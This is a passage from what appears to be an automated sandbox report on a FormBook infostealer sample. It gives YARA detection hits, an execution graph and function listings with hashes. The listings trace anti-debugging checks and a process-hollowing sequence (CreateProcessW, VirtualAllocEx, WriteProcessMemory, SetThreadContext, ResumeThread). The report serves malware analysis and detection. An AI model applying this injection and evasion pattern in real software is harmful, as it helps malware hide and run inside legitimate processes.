                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:34.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:3.2%
                                                                                        Total number of Nodes:93
                                                                                        Total number of Limit Nodes:3
                                                                                        execution_graph 4402 aa726a ReadProcessMemory 4403 aa732f 4402->4403 4311 aa1208 4312 aa122a 4311->4312 4315 aa1858 4312->4315 4313 aa127d 4316 aa1884 4315->4316 4322 aa1929 4316->4322 4334 aa1938 4316->4334 4346 aa1c8b 4316->4346 4353 aa1c42 4316->4353 4317 aa1894 4317->4313 4326 aa195a 4322->4326 4323 aa1bf6 4366 aa0310 4323->4366 4325 aa0310 FindCloseChangeNotification 4325->4323 4326->4323 4327 aa1b7f 4326->4327 4328 aa19a7 4326->4328 4358 aa2ac8 4326->4358 4362 aa2ac0 4326->4362 4327->4325 4328->4317 4329 aa1c3b 4329->4328 4370 aa2e90 4329->4370 4374 aa2e98 4329->4374 4336 aa195a 4334->4336 4335 aa19a7 4335->4317 4335->4335 4336->4335 4339 aa1bf6 4336->4339 4340 aa1b7f 4336->4340 4342 aa2ac8 CheckRemoteDebuggerPresent 4336->4342 4343 aa2ac0 CheckRemoteDebuggerPresent 4336->4343 4337 aa0310 FindCloseChangeNotification 4341 aa1c3b 4337->4341 4338 aa0310 FindCloseChangeNotification 4338->4339 4339->4337 4340->4338 4340->4340 4341->4335 4344 aa2e98 EnumWindows 4341->4344 4345 aa2e90 EnumWindows 4341->4345 4342->4340 4343->4340 4344->4335 4345->4335 4347 aa1c00 4346->4347 4348 aa0310 FindCloseChangeNotification 4347->4348 4350 aa1c3b 4348->4350 4349 aa1c70 4349->4317 4350->4349 4351 aa2e98 EnumWindows 4350->4351 4352 aa2e90 EnumWindows 4350->4352 4351->4349 4352->4349 4354 aa1c53 4353->4354 4355 aa1c70 4354->4355 4356 aa2e98 EnumWindows 4354->4356 4357 aa2e90 EnumWindows 4354->4357 4355->4317 4356->4355 4357->4355 4359 aa2b11 CheckRemoteDebuggerPresent 4358->4359 4361 aa2b68 4359->4361 4361->4327 4363 aa2b11 CheckRemoteDebuggerPresent 4362->4363 4365 aa2b68 4363->4365 4365->4327 4367 aa2bc8 FindCloseChangeNotification 4366->4367 4369 aa2c58 4367->4369 4369->4329 4371 aa2edc EnumWindows 4370->4371 4373 aa2f43 4371->4373 4373->4328 4375 aa2edc EnumWindows 4374->4375 4377 aa2f43 4375->4377 4377->4328 4398 aa7488 4399 aa74f9 4398->4399 4400 aa750e WriteProcessMemory 4398->4400 4399->4400 4401 aa7570 4400->4401 4408 aa75c8 4409 aa75ce ResumeThread 4408->4409 4411 aa7566 4408->4411 4410 aa7658 4409->4410 4380 aa6d60 4381 aa6ded CreateProcessW 4380->4381 4383 aa6f54 4381->4383 4384 aa7160 4385 aa71be 4384->4385 4386 aa71d3 SetThreadContext 4384->4386 4385->4386 4387 aa721c 4386->4387 4388 aa7381 VirtualAllocEx 4389 aa743f 4388->4389 4412 aa2bc1 4413 aa2c0d FindCloseChangeNotification 4412->4413 4414 aa2c58 4413->4414 4404 aa11fb 4405 aa122a 4404->4405 4407 aa1858 5 API calls 4405->4407 4406 aa127d 4407->4406 4415 aa7158 4416 aa71be 4415->4416 4417 aa71d3 SetThreadContext 4415->4417 4416->4417 4418 aa721c 4417->4418 4390 aa7490 4391 aa74f9 4390->4391 4392 aa750e WriteProcessMemory 4390->4392 4391->4392 4393 aa7570 4392->4393 4394 aa7270 ReadProcessMemory 4395 aa732f 4394->4395 4396 aa75d0 ResumeThread 4397 aa7658 4396->4397 4419 aa6d54 4420 aa6ded CreateProcessW 4419->4420 4422 aa6f54 4420->4422 4422->4422

                                                                                        Executed Functions

                                                                                        Function 00AA2AC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 145 aa2ac8-aa2b66 CheckRemoteDebuggerPresent 148 aa2b68-aa2b6e 145->148 149 aa2b6f-aa2bb3 145->149 148->149
                                                                                        APIs
                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00AA2B56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                        • String ID: iLc
                                                                                        • API String ID: 3662101638-1587214415
                                                                                        • Opcode ID: 4bff98d12aa2654ed60979c6e73ede7381b10a701921a0ec6c900b9aae57caa4
                                                                                        • Instruction ID: 6c41cebad5dc1192dbaab2bf384f5336315780cafa610b158e848e0e499c761c
                                                                                        • Opcode Fuzzy Hash: 4bff98d12aa2654ed60979c6e73ede7381b10a701921a0ec6c900b9aae57caa4
                                                                                        • Instruction Fuzzy Hash: 8031A8B5D012189FCB10CFA9D884AEEFBF5BB49314F14942AE815B7200C779A946CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA4349 Relevance: .6, Instructions: 571COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11d37f1135d26cfc4aa57d02b868f3ef881f14ad031ec0a9d0019ca95bfaffbe
                                                                                        • Instruction ID: aa02d52405bc07f4ffd86f4915d0d2fa1d831382731c13ebd25b1fb98183a5e8
                                                                                        • Opcode Fuzzy Hash: 11d37f1135d26cfc4aa57d02b868f3ef881f14ad031ec0a9d0019ca95bfaffbe
                                                                                        • Instruction Fuzzy Hash: EC529774A012298FDB64CF69D984B99B7F1FF89310F1081E9E909AB3A1DB709D85CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA0971 Relevance: .6, Instructions: 569COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03745376197e9e4ee8186f7de0a0abe0d870e8eacef877d0743324601f50e49d
                                                                                        • Instruction ID: 1d5c2e428279f4d5577031cc7f3d770fd09badea60e926735ff4d131494c7831
                                                                                        • Opcode Fuzzy Hash: 03745376197e9e4ee8186f7de0a0abe0d870e8eacef877d0743324601f50e49d
                                                                                        • Instruction Fuzzy Hash: 5D429574A01219CFDB64CF69C994B99BBF2BF49310F1081E9E909AB3A5DB309D85CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA6D54 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 aa6d54-aa6deb 1 aa6ded-aa6dff 0->1 2 aa6e02-aa6e10 0->2 1->2 3 aa6e12-aa6e24 2->3 4 aa6e27-aa6e63 2->4 3->4 5 aa6e77-aa6f52 CreateProcessW 4->5 6 aa6e65-aa6e74 4->6 10 aa6f5b-aa7024 5->10 11 aa6f54-aa6f5a 5->11 6->5 20 aa705a-aa7065 10->20 21 aa7026-aa704f 10->21 11->10 25 aa7066 20->25 21->20 25->25
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00AA6F3F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID: iLc
                                                                                        • API String ID: 963392458-1587214415
                                                                                        • Opcode ID: b25e5aac66af4b8d2c01bd68f7e8ad03d7aab8d2d27c2b199f5c1c3951c3b10f
                                                                                        • Instruction ID: e8e77757792aca6e6c6883a0a4453462c52044ffc1f5f1fc22e8ce5337545670
                                                                                        • Opcode Fuzzy Hash: b25e5aac66af4b8d2c01bd68f7e8ad03d7aab8d2d27c2b199f5c1c3951c3b10f
                                                                                        • Instruction Fuzzy Hash: 1881D175D0426D9FCF25CFA4C880BEEBBB1AB5A304F0590AAE509B7250D7709E85CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA6D60 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 26 aa6d60-aa6deb 27 aa6ded-aa6dff 26->27 28 aa6e02-aa6e10 26->28 27->28 29 aa6e12-aa6e24 28->29 30 aa6e27-aa6e63 28->30 29->30 31 aa6e77-aa6f52 CreateProcessW 30->31 32 aa6e65-aa6e74 30->32 36 aa6f5b-aa7024 31->36 37 aa6f54-aa6f5a 31->37 32->31 46 aa705a-aa7065 36->46 47 aa7026-aa704f 36->47 37->36 51 aa7066 46->51 47->46 51->51
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00AA6F3F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID: iLc
                                                                                        • API String ID: 963392458-1587214415
                                                                                        • Opcode ID: 5994f909e2cd76fa55241c9447b5c9b7c3812b2e38528138da111f30ba945369
                                                                                        • Instruction ID: 92da65ae8dd6dd4569d5628a8bcc02e4bebc1350bad49672afb6d964a64e59fb
                                                                                        • Opcode Fuzzy Hash: 5994f909e2cd76fa55241c9447b5c9b7c3812b2e38528138da111f30ba945369
                                                                                        • Instruction Fuzzy Hash: 0781D2B5D0426D9FCF25CFA4C880BDEBBB1AB5A304F0590AAE509B7250D7709E85CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7488 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 52 aa7488-aa74f7 53 aa74f9-aa750b 52->53 54 aa750e-aa756e WriteProcessMemory 52->54 53->54 55 aa7570-aa7576 54->55 56 aa7577-aa75b5 54->56 55->56
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00AA755E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID: iLc
                                                                                        • API String ID: 3559483778-1587214415
                                                                                        • Opcode ID: 44ddabc816a335bf8ffb45e9eded0fa6bb7e4ba56cf714d7ed675d920ede009a
                                                                                        • Instruction ID: 54b01c45d8703b23d6bd378a5878eca2bbef2471fde43fa16809f06aadd23eaf
                                                                                        • Opcode Fuzzy Hash: 44ddabc816a335bf8ffb45e9eded0fa6bb7e4ba56cf714d7ed675d920ede009a
                                                                                        • Instruction Fuzzy Hash: EF419AB5D042599FCF10CFA9D984AEEFBF1BB4A310F24902AE814B7250D375AA45CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7490 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 59 aa7490-aa74f7 60 aa74f9-aa750b 59->60 61 aa750e-aa756e WriteProcessMemory 59->61 60->61 62 aa7570-aa7576 61->62 63 aa7577-aa75b5 61->63 62->63
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00AA755E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID: iLc
                                                                                        • API String ID: 3559483778-1587214415
                                                                                        • Opcode ID: 8a7154730064207aa6e0313c8c06b3d7c0144ef15a05188b513acb5d98f6feed
                                                                                        • Instruction ID: cfa049aa78b140afe2ad2e4a79e5b111e9a5d8bec185766ade4ea5f13377e6a8
                                                                                        • Opcode Fuzzy Hash: 8a7154730064207aa6e0313c8c06b3d7c0144ef15a05188b513acb5d98f6feed
                                                                                        • Instruction Fuzzy Hash: 124189B5D042589FCF00CFA9D984ADEFBF1BB49310F24902AE818B7250D375AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA75C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 66 aa75c8-aa75cc 67 aa75ce-aa7656 ResumeThread 66->67 68 aa7566-aa75b5 66->68 70 aa7658-aa765e 67->70 71 aa765f-aa768d 67->71 70->71
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 00AA7646
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: iLc
                                                                                        • API String ID: 947044025-1587214415
                                                                                        • Opcode ID: 7576ae66f6c5486a65c1581f9396469e0b0ead99d5561e066683c1c501bdb65a
                                                                                        • Instruction ID: 86aabf631554e6c67428ae757d2b40421e8abf4f34c38b905d38795cd4061a00
                                                                                        • Opcode Fuzzy Hash: 7576ae66f6c5486a65c1581f9396469e0b0ead99d5561e066683c1c501bdb65a
                                                                                        • Instruction Fuzzy Hash: 5341BDB5D052199FCB10CFA9E984ADEFBF0EB59324F24905AE815B7350D334A945CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA726A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 76 aa726a-aa732d ReadProcessMemory 77 aa732f-aa7335 76->77 78 aa7336-aa7374 76->78 77->78
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00AA731D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID: iLc
                                                                                        • API String ID: 1726664587-1587214415
                                                                                        • Opcode ID: be5a7352f756a2bcbb0f67be32d644f65f4912d3f15c1a7a5acb313d16132645
                                                                                        • Instruction ID: 756343a96f3fef531240cc623250359864f7d2c28c40787eba9e8175a19c7347
                                                                                        • Opcode Fuzzy Hash: be5a7352f756a2bcbb0f67be32d644f65f4912d3f15c1a7a5acb313d16132645
                                                                                        • Instruction Fuzzy Hash: 9F4178B9D04258DFCF10CFAAD884ADEFBB1BB5A310F14A02AE815B7250C335A945DF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7270 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 81 aa7270-aa732d ReadProcessMemory 82 aa732f-aa7335 81->82 83 aa7336-aa7374 81->83 82->83
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00AA731D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID: iLc
                                                                                        • API String ID: 1726664587-1587214415
                                                                                        • Opcode ID: 3b731267b345199670c0048f110cf7c0757e95879f1919792f0cd47dbbf0549f
                                                                                        • Instruction ID: 0ef12fe02c0001b8c608091145187e424169638a810bb9c42744932b237eec4e
                                                                                        • Opcode Fuzzy Hash: 3b731267b345199670c0048f110cf7c0757e95879f1919792f0cd47dbbf0549f
                                                                                        • Instruction Fuzzy Hash: A23176B9D04258DFCF10CFAAD884ADEFBB1BB1A310F14A02AE815B7210D335A945DF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7381 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 86 aa7381-aa743d VirtualAllocEx 87 aa743f-aa7445 86->87 88 aa7446-aa747c 86->88 87->88
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00AA742D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: iLc
                                                                                        • API String ID: 4275171209-1587214415
                                                                                        • Opcode ID: 74bb3f54ea57668ca3f26afce045249f5b050c009eadc37acd86de0cf7e12091
                                                                                        • Instruction ID: eb42bc8f2a183d3066e4faf869bb2e37eb741ca030eba854e1c55802da43e0e1
                                                                                        • Opcode Fuzzy Hash: 74bb3f54ea57668ca3f26afce045249f5b050c009eadc37acd86de0cf7e12091
                                                                                        • Instruction Fuzzy Hash: 873168B9D042589FCF10CFA9E884ADEFBB1BB5A310F14A01AE815B7310D375A945CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7388 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 91 aa7388-aa743d VirtualAllocEx 92 aa743f-aa7445 91->92 93 aa7446-aa747c 91->93 92->93
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00AA742D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: iLc
                                                                                        • API String ID: 4275171209-1587214415
                                                                                        • Opcode ID: 66d7ad9c58d026acb7d39e914e6c01408264ad2397a3437a1eae87d4b5a63886
                                                                                        • Instruction ID: 501bdb455d69a35728d683b5a322efe2477a644d69b07a67a78be62a1b308a6e
                                                                                        • Opcode Fuzzy Hash: 66d7ad9c58d026acb7d39e914e6c01408264ad2397a3437a1eae87d4b5a63886
                                                                                        • Instruction Fuzzy Hash: 753173B9D042589FCF10CFA9E884ADEFBB5BB5A310F14A02AE814B7310D335A945CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA2E90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 96 aa2e90-aa2eeb 98 aa2ef8-aa2f41 EnumWindows 96->98 99 aa2eed 96->99 102 aa2f4a-aa2f96 98->102 103 aa2f43-aa2f49 98->103 101 aa2ef5 99->101 101->98 103->102
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumWindows
                                                                                        • String ID: iLc
                                                                                        • API String ID: 1129996299-1587214415
                                                                                        • Opcode ID: b962e52af72e85485c131ccb098f3407ae89e88fa270e3b84a67d4252ddb3562
                                                                                        • Instruction ID: d3755bdb3acf927c805a1089a613421a4d419c2aaf92ccc185d0b98b68d2ca3d
                                                                                        • Opcode Fuzzy Hash: b962e52af72e85485c131ccb098f3407ae89e88fa270e3b84a67d4252ddb3562
                                                                                        • Instruction Fuzzy Hash: C031DCB5D052189FCB14CFA9D884AEEFBB1BF8A314F14902AE805B7250C774A946CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 109 aa7158-aa71bc 110 aa71be-aa71d0 109->110 111 aa71d3-aa721a SetThreadContext 109->111 110->111 112 aa721c-aa7222 111->112 113 aa7223-aa725b 111->113 112->113
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,?), ref: 00AA720A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID: iLc
                                                                                        • API String ID: 1591575202-1587214415
                                                                                        • Opcode ID: eb473de59e785ccf3108308747e1f5362c45a99aabcae81390ef57183f176102
                                                                                        • Instruction ID: 207b1e43ba686482251f048286c09af5cfc572599fae495a0101c7f281d1ca5f
                                                                                        • Opcode Fuzzy Hash: eb473de59e785ccf3108308747e1f5362c45a99aabcae81390ef57183f176102
                                                                                        • Instruction Fuzzy Hash: EC319CB5D052589FCB10CFA9E884AEEFBF1BB49314F24902AE415B7350D3789949CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA7160 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 116 aa7160-aa71bc 117 aa71be-aa71d0 116->117 118 aa71d3-aa721a SetThreadContext 116->118 117->118 119 aa721c-aa7222 118->119 120 aa7223-aa725b 118->120 119->120
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,?), ref: 00AA720A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID: iLc
                                                                                        • API String ID: 1591575202-1587214415
                                                                                        • Opcode ID: ab5c50ba3b5cc2a458e2af83271080cd469174386739f063484cc58bc07ef537
                                                                                        • Instruction ID: ee3f0295ac4a2aa58eee010ad209724d79ef67b326df97587803218249e6571e
                                                                                        • Opcode Fuzzy Hash: ab5c50ba3b5cc2a458e2af83271080cd469174386739f063484cc58bc07ef537
                                                                                        • Instruction Fuzzy Hash: 03319BB5D052589FCB10CFA9D884ADEFBF5BB49314F14802AE414B7350D378AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA2E98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 123 aa2e98-aa2eeb 125 aa2ef8-aa2f41 EnumWindows 123->125 126 aa2eed 123->126 129 aa2f4a-aa2f96 125->129 130 aa2f43-aa2f49 125->130 128 aa2ef5 126->128 128->125 130->129
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumWindows
                                                                                        • String ID: iLc
                                                                                        • API String ID: 1129996299-1587214415
                                                                                        • Opcode ID: a5088616449eeea96887715f0ccb455fca8a7319156443bf389a364b89ef6a95
                                                                                        • Instruction ID: 85b7664736ca3d4de22a1c56124c3e5427905bb044ae851a47014b7a1de85930
                                                                                        • Opcode Fuzzy Hash: a5088616449eeea96887715f0ccb455fca8a7319156443bf389a364b89ef6a95
                                                                                        • Instruction Fuzzy Hash: 3931CCB4D052189FCB14CFA9D884AEEFBB1BF4A314F14902AE805B7340C774A945CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA2AC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 136 aa2ac0-aa2b66 CheckRemoteDebuggerPresent 139 aa2b68-aa2b6e 136->139 140 aa2b6f-aa2bb3 136->140 139->140
                                                                                        APIs
                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00AA2B56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                        • String ID: iLc
                                                                                        • API String ID: 3662101638-1587214415
                                                                                        • Opcode ID: d1544f813d4ff25fd9db67036e729d442447d5a1529f56f73b02cc897d87ca03
                                                                                        • Instruction ID: a65b378dceb4521860611473eab448c922a525bee320939442d936532e8f8105
                                                                                        • Opcode Fuzzy Hash: d1544f813d4ff25fd9db67036e729d442447d5a1529f56f73b02cc897d87ca03
